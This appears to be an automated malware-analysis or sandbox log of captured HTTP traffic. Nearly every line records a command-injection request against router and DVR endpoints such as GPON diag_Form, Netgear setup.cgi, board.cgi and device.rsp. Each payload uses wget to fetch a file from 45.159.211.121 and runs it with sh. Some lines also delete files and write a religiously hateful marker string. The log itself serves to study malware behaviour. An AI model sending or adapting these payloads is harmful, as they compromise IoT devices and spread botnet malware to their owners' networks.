Source: global traffic HTTP traffic detected: POST /GponForm/diag_Form?images/ HTTP/1.1Host: 192.168.0.57Content-Length: 216Connection: closeData Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 77 67 65 74 20 68 74 74 70 3a 2f 2f 16 17 0c 13 17 10 0c 13 13 10 0c 16 14 22 2f 67 70 6f 6e 5f 6c 6f 63 61 6c 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 34 35 2e 31 35 39 2e 32 31 31 2e 31 32 31 2f 66 20 2d 4f 2d 7c 73 68 60 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 16 17 0c 13 17 10 0c 13 13 10 0c 16 14 22 2f 67 70 6f 6e 5f 6c 6f 63 61 6c 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 34 35 2e 31 35 39 2e 32 31 31 2e 31 32 31 2f 66 20 2d 4f 2d 7c 73 68 26 69 70 76 3d 30 Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`wget http://"/gpon_local; wget http://45.159.211.121/f -O-|sh`;wget http://"/gpon_local; wget http://45.159.211.121/f -O-|sh&ipv=0
Source: global traffic HTTP traffic detected: GET /language/Swedish && cd /tmp && echo 'allah_is_satan' > satan || cd /mnt && echo 'allah_is_satan' > satan; wget http://"/local_dvr1; wget http://45.159.211.121/f -O allah_is_satan;sh allah_is_satan && tar /string.js HTTP/1.1Host: 192.168.0.57Connection: close
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+f;wget+http://"/local_dvr2;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.57Connection: close
Source: global traffic HTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_dvr3_macron;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.57Connection: close
Source: global traffic HTTP traffic detected: GET /cgi-bin/;cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_netgear1;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.57Connection: close
Source: global traffic HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=cd /tmp;wget http://"/local_netgear_dgn1000;wget http://45.159.211.121/f -O fck;sh fck;&curpath=/&currentsetting.htm=1 HTTP/1.1Host: 192.168.0.57Connection: close
Source: global traffic HTTP traffic detected: GET /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd /mnt||cd /tmp;wget http://"/local_tbk_dvr;wget http://45.159.211.121/f -O fck;sh fck; HTTP/1.1Host: 192.168.0.57Connection: close
Source: global traffic HTTP traffic detected: POST /GponForm/diag_Form?images/ HTTP/1.1Host: 192.168.0.56Content-Length: 216Connection: closeData Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 77 67 65 74 20 68 74 74 70 3a 2f 2f 16 17 0c 13 17 10 0c 13 13 10 0c 16 14 22 2f 67 70 6f 6e 5f 6c 6f 63 61 6c 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 34 35 2e 31 35 39 2e 32 31 31 2e 31 32 31 2f 66 20 2d 4f 2d 7c 73 68 60 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 16 17 0c 13 17 10 0c 13 13 10 0c 16 14 22 2f 67 70 6f 6e 5f 6c 6f 63 61 6c 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 34 35 2e 31 35 39 2e 32 31 31 2e 31 32 31 2f 66 20 2d 4f 2d 7c 73 68 26 69 70 76 3d 30 Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`wget http://"/gpon_local; wget http://45.159.211.121/f -O-|sh`;wget http://"/gpon_local; wget http://45.159.211.121/f -O-|sh&ipv=0
Source: global traffic HTTP traffic detected: GET /language/Swedish && cd /tmp && echo 'allah_is_satan' > satan || cd /mnt && echo 'allah_is_satan' > satan; wget http://"/local_dvr1; wget http://45.159.211.121/f -O allah_is_satan;sh allah_is_satan && tar /string.js HTTP/1.1Host: 192.168.0.56Connection: close
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+f;wget+http://"/local_dvr2;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.56Connection: close
Source: global traffic HTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_dvr3_macron;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.56Connection: close
Source: global traffic HTTP traffic detected: GET /cgi-bin/;cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_netgear1;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.56Connection: close
Source: global traffic HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=cd /tmp;wget http://"/local_netgear_dgn1000;wget http://45.159.211.121/f -O fck;sh fck;&curpath=/&currentsetting.htm=1 HTTP/1.1Host: 192.168.0.56Connection: close
Source: global traffic HTTP traffic detected: GET /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd /mnt||cd /tmp;wget http://"/local_tbk_dvr;wget http://45.159.211.121/f -O fck;sh fck; HTTP/1.1Host: 192.168.0.56Connection: close
Source: global traffic HTTP traffic detected: POST /GponForm/diag_Form?images/ HTTP/1.1Host: 192.168.0.64Content-Length: 216Connection: closeData Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 77 67 65 74 20 68 74 74 70 3a 2f 2f 16 17 0c 13 17 10 0c 13 13 10 0c 16 14 22 2f 67 70 6f 6e 5f 6c 6f 63 61 6c 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 34 35 2e 31 35 39 2e 32 31 31 2e 31 32 31 2f 66 20 2d 4f 2d 7c 73 68 60 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 16 17 0c 13 17 10 0c 13 13 10 0c 16 14 22 2f 67 70 6f 6e 5f 6c 6f 63 61 6c 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 34 35 2e 31 35 39 2e 32 31 31 2e 31 32 31 2f 66 20 2d 4f 2d 7c 73 68 26 69 70 76 3d 30 Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`wget http://"/gpon_local; wget http://45.159.211.121/f -O-|sh`;wget http://"/gpon_local; wget http://45.159.211.121/f -O-|sh&ipv=0
Source: global traffic HTTP traffic detected: POST /GponForm/diag_Form?images/ HTTP/1.1Host: 192.168.0.61Content-Length: 216Connection: closeData Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 77 67 65 74 20 68 74 74 70 3a 2f 2f 16 17 0c 13 17 10 0c 13 13 10 0c 16 14 22 2f 67 70 6f 6e 5f 6c 6f 63 61 6c 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 34 35 2e 31 35 39 2e 32 31 31 2e 31 32 31 2f 66 20 2d 4f 2d 7c 73 68 60 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 16 17 0c 13 17 10 0c 13 13 10 0c 16 14 22 2f 67 70 6f 6e 5f 6c 6f 63 61 6c 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 34 35 2e 31 35 39 2e 32 31 31 2e 31 32 31 2f 66 20 2d 4f 2d 7c 73 68 26 69 70 76 3d 30 Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`wget http://"/gpon_local; wget http://45.159.211.121/f -O-|sh`;wget http://"/gpon_local; wget http://45.159.211.121/f -O-|sh&ipv=0
Source: global traffic HTTP traffic detected: GET /language/Swedish && cd /tmp && echo 'allah_is_satan' > satan || cd /mnt && echo 'allah_is_satan' > satan; wget http://"/local_dvr1; wget http://45.159.211.121/f -O allah_is_satan;sh allah_is_satan && tar /string.js HTTP/1.1Host: 192.168.0.64Connection: close
Source: global traffic HTTP traffic detected: GET /language/Swedish && cd /tmp && echo 'allah_is_satan' > satan || cd /mnt && echo 'allah_is_satan' > satan; wget http://"/local_dvr1; wget http://45.159.211.121/f -O allah_is_satan;sh allah_is_satan && tar /string.js HTTP/1.1Host: 192.168.0.61Connection: close
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+f;wget+http://"/local_dvr2;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.64Connection: close
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+f;wget+http://"/local_dvr2;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.61Connection: close
Source: global traffic HTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_dvr3_macron;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.64Connection: close
Source: global traffic HTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_dvr3_macron;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.61Connection: close
Source: global traffic HTTP traffic detected: GET /cgi-bin/;cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_netgear1;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.64Connection: close
Source: global traffic HTTP traffic detected: GET /cgi-bin/;cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_netgear1;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.61Connection: close
Source: global traffic HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=cd /tmp;wget http://"/local_netgear_dgn1000;wget http://45.159.211.121/f -O fck;sh fck;&curpath=/&currentsetting.htm=1 HTTP/1.1Host: 192.168.0.64Connection: close
Source: global traffic HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=cd /tmp;wget http://"/local_netgear_dgn1000;wget http://45.159.211.121/f -O fck;sh fck;&curpath=/&currentsetting.htm=1 HTTP/1.1Host: 192.168.0.61Connection: close
Source: global traffic HTTP traffic detected: GET /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd /mnt||cd /tmp;wget http://"/local_tbk_dvr;wget http://45.159.211.121/f -O fck;sh fck; HTTP/1.1Host: 192.168.0.64Connection: close
Source: global traffic HTTP traffic detected: GET /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd /mnt||cd /tmp;wget http://"/local_tbk_dvr;wget http://45.159.211.121/f -O fck;sh fck; HTTP/1.1Host: 192.168.0.61Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.31.205.163Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.31.205.163Connection: close
Source: global traffic HTTP traffic detected: POST /GponForm/diag_Form?images/ HTTP/1.1Host: 192.168.0.94Content-Length: 216Connection: closeData Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 77 67 65 74 20 68 74 74 70 3a 2f 2f 16 17 0c 13 17 10 0c 13 13 10 0c 16 14 22 2f 67 70 6f 6e 5f 6c 6f 63 61 6c 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 34 35 2e 31 35 39 2e 32 31 31 2e 31 32 31 2f 66 20 2d 4f 2d 7c 73 68 60 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 16 17 0c 13 17 10 0c 13 13 10 0c 16 14 22 2f 67 70 6f 6e 5f 6c 6f 63 61 6c 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 34 35 2e 31 35 39 2e 32 31 31 2e 31 32 31 2f 66 20 2d 4f 2d 7c 73 68 26 69 70 76 3d 30 Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`wget http://"/gpon_local; wget http://45.159.211.121/f -O-|sh`;wget http://"/gpon_local; wget http://45.159.211.121/f -O-|sh&ipv=0
Source: global traffic HTTP traffic detected: GET /language/Swedish && cd /tmp && echo 'allah_is_satan' > satan || cd /mnt && echo 'allah_is_satan' > satan; wget http://"/local_dvr1; wget http://45.159.211.121/f -O allah_is_satan;sh allah_is_satan && tar /string.js HTTP/1.1Host: 192.168.0.94Connection: close
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+f;wget+http://"/local_dvr2;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.94Connection: close
Source: global traffic HTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_dvr3_macron;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.94Connection: close
Source: global traffic HTTP traffic detected: GET /cgi-bin/;cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_netgear1;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.94Connection: close
Source: global traffic HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=cd /tmp;wget http://"/local_netgear_dgn1000;wget http://45.159.211.121/f -O fck;sh fck;&curpath=/&currentsetting.htm=1 HTTP/1.1Host: 192.168.0.94Connection: close
Source: global traffic HTTP traffic detected: GET /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd /mnt||cd /tmp;wget http://"/local_tbk_dvr;wget http://45.159.211.121/f -O fck;sh fck; HTTP/1.1Host: 192.168.0.94Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.177.76.70Connection: close
Source: global traffic HTTP traffic detected: POST /GponForm/diag_Form?images/ HTTP/1.1Host: 192.168.0.93Content-Length: 216Connection: closeData Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 77 67 65 74 20 68 74 74 70 3a 2f 2f 16 17 0c 13 17 10 0c 13 13 10 0c 16 14 22 2f 67 70 6f 6e 5f 6c 6f 63 61 6c 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 34 35 2e 31 35 39 2e 32 31 31 2e 31 32 31 2f 66 20 2d 4f 2d 7c 73 68 60 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 16 17 0c 13 17 10 0c 13 13 10 0c 16 14 22 2f 67 70 6f 6e 5f 6c 6f 63 61 6c 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 34 35 2e 31 35 39 2e 32 31 31 2e 31 32 31 2f 66 20 2d 4f 2d 7c 73 68 26 69 70 76 3d 30 Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`wget http://"/gpon_local; wget http://45.159.211.121/f -O-|sh`;wget http://"/gpon_local; wget http://45.159.211.121/f -O-|sh&ipv=0
Source: global traffic HTTP traffic detected: POST /GponForm/diag_Form?images/ HTTP/1.1Host: 192.168.0.95Content-Length: 216Connection: closeData Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 77 67 65 74 20 68 74 74 70 3a 2f 2f 16 17 0c 13 17 10 0c 13 13 10 0c 16 14 22 2f 67 70 6f 6e 5f 6c 6f 63 61 6c 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 34 35 2e 31 35 39 2e 32 31 31 2e 31 32 31 2f 66 20 2d 4f 2d 7c 73 68 60 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 16 17 0c 13 17 10 0c 13 13 10 0c 16 14 22 2f 67 70 6f 6e 5f 6c 6f 63 61 6c 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 34 35 2e 31 35 39 2e 32 31 31 2e 31 32 31 2f 66 20 2d 4f 2d 7c 73 68 26 69 70 76 3d 30 Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`wget http://"/gpon_local; wget http://45.159.211.121/f -O-|sh`;wget http://"/gpon_local; wget http://45.159.211.121/f -O-|sh&ipv=0
Source: global traffic HTTP traffic detected: GET /language/Swedish && cd /tmp && echo 'allah_is_satan' > satan || cd /mnt && echo 'allah_is_satan' > satan; wget http://"/local_dvr1; wget http://45.159.211.121/f -O allah_is_satan;sh allah_is_satan && tar /string.js HTTP/1.1Host: 192.168.0.93Connection: close
Source: global traffic HTTP traffic detected: GET /language/Swedish && cd /tmp && echo 'allah_is_satan' > satan || cd /mnt && echo 'allah_is_satan' > satan; wget http://"/local_dvr1; wget http://45.159.211.121/f -O allah_is_satan;sh allah_is_satan && tar /string.js HTTP/1.1Host: 192.168.0.95Connection: close
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+f;wget+http://"/local_dvr2;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.93Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.177.76.70Connection: close
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+f;wget+http://"/local_dvr2;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.95Connection: close
Source: global traffic HTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_dvr3_macron;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.93Connection: close
Source: global traffic HTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_dvr3_macron;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.95Connection: close
Source: global traffic HTTP traffic detected: GET /cgi-bin/;cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_netgear1;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.93Connection: close
Source: global traffic HTTP traffic detected: GET /cgi-bin/;cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_netgear1;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.95Connection: close
Source: global traffic HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=cd /tmp;wget http://"/local_netgear_dgn1000;wget http://45.159.211.121/f -O fck;sh fck;&curpath=/&currentsetting.htm=1 HTTP/1.1Host: 192.168.0.93Connection: close
Source: global traffic HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=cd /tmp;wget http://"/local_netgear_dgn1000;wget http://45.159.211.121/f -O fck;sh fck;&curpath=/&currentsetting.htm=1 HTTP/1.1Host: 192.168.0.95Connection: close
Source: global traffic HTTP traffic detected: GET /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd /mnt||cd /tmp;wget http://"/local_tbk_dvr;wget http://45.159.211.121/f -O fck;sh fck; HTTP/1.1Host: 192.168.0.93Connection: close
Source: global traffic HTTP traffic detected: GET /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd /mnt||cd /tmp;wget http://"/local_tbk_dvr;wget http://45.159.211.121/f -O fck;sh fck; HTTP/1.1Host: 192.168.0.95Connection: close
Source: global traffic HTTP traffic detected: POST /GponForm/diag_Form?images/ HTTP/1.1Host: 192.168.0.97Content-Length: 216Connection: closeData Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 77 67 65 74 20 68 74 74 70 3a 2f 2f 16 17 0c 13 17 10 0c 13 13 10 0c 16 14 22 2f 67 70 6f 6e 5f 6c 6f 63 61 6c 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 34 35 2e 31 35 39 2e 32 31 31 2e 31 32 31 2f 66 20 2d 4f 2d 7c 73 68 60 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 16 17 0c 13 17 10 0c 13 13 10 0c 16 14 22 2f 67 70 6f 6e 5f 6c 6f 63 61 6c 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 34 35 2e 31 35 39 2e 32 31 31 2e 31 32 31 2f 66 20 2d 4f 2d 7c 73 68 26 69 70 76 3d 30 Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`wget http://"/gpon_local; wget http://45.159.211.121/f -O-|sh`;wget http://"/gpon_local; wget http://45.159.211.121/f -O-|sh&ipv=0
Source: global traffic HTTP traffic detected: GET /language/Swedish && cd /tmp && echo 'allah_is_satan' > satan || cd /mnt && echo 'allah_is_satan' > satan; wget http://"/local_dvr1; wget http://45.159.211.121/f -O allah_is_satan;sh allah_is_satan && tar /string.js HTTP/1.1Host: 192.168.0.97Connection: close
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+f;wget+http://"/local_dvr2;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.97Connection: close
Source: global traffic HTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_dvr3_macron;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.97Connection: close
Source: global traffic HTTP traffic detected: GET /cgi-bin/;cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_netgear1;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.97Connection: close
Source: global traffic HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=cd /tmp;wget http://"/local_netgear_dgn1000;wget http://45.159.211.121/f -O fck;sh fck;&curpath=/&currentsetting.htm=1 HTTP/1.1Host: 192.168.0.97Connection: close
Source: global traffic HTTP traffic detected: GET /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd /mnt||cd /tmp;wget http://"/local_tbk_dvr;wget http://45.159.211.121/f -O fck;sh fck; HTTP/1.1Host: 192.168.0.97Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 141.8.192.170Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 212.5.69.131Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 212.5.69.131Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 212.5.69.131Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 212.5.69.131Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 212.5.69.131Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 212.5.69.131Connection: close
Source: global traffic HTTP traffic detected: POST /GponForm/diag_Form?images/ HTTP/1.1Host: 192.168.0.124Content-Length: 216Connection: closeData Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 77 67 65 74 20 68 74 74 70 3a 2f 2f 16 17 0c 13 17 10 0c 13 13 10 0c 16 14 22 2f 67 70 6f 6e 5f 6c 6f 63 61 6c 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 34 35 2e 31 35 39 2e 32 31 31 2e 31 32 31 2f 66 20 2d 4f 2d 7c 73 68 60 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 16 17 0c 13 17 10 0c 13 13 10 0c 16 14 22 2f 67 70 6f 6e 5f 6c 6f 63 61 6c 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 34 35 2e 31 35 39 2e 32 31 31 2e 31 32 31 2f 66 20 2d 4f 2d 7c 73 68 26 69 70 76 3d 30 Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`wget http://"/gpon_local; wget http://45.159.211.121/f -O-|sh`;wget http://"/gpon_local; wget http://45.159.211.121/f -O-|sh&ipv=0
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 212.5.69.131Connection: close
Source: global traffic HTTP traffic detected: GET /language/Swedish && cd /tmp && echo 'allah_is_satan' > satan || cd /mnt && echo 'allah_is_satan' > satan; wget http://"/local_dvr1; wget http://45.159.211.121/f -O allah_is_satan;sh allah_is_satan && tar /string.js HTTP/1.1Host: 192.168.0.124Connection: close
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+f;wget+http://"/local_dvr2;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.124Connection: close
Source: global traffic HTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_dvr3_macron;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.124Connection: close
Source: global traffic HTTP traffic detected: GET /cgi-bin/;cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_netgear1;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.124Connection: close
Source: global traffic HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=cd /tmp;wget http://"/local_netgear_dgn1000;wget http://45.159.211.121/f -O fck;sh fck;&curpath=/&currentsetting.htm=1 HTTP/1.1Host: 192.168.0.124Connection: close
Source: global traffic HTTP traffic detected: GET /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd /mnt||cd /tmp;wget http://"/local_tbk_dvr;wget http://45.159.211.121/f -O fck;sh fck; HTTP/1.1Host: 192.168.0.124Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.31.196.221Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.31.196.221Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.31.196.221Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.31.196.221Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.31.196.221Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.31.196.221Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.31.196.221Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 87.236.16.43Connection: close
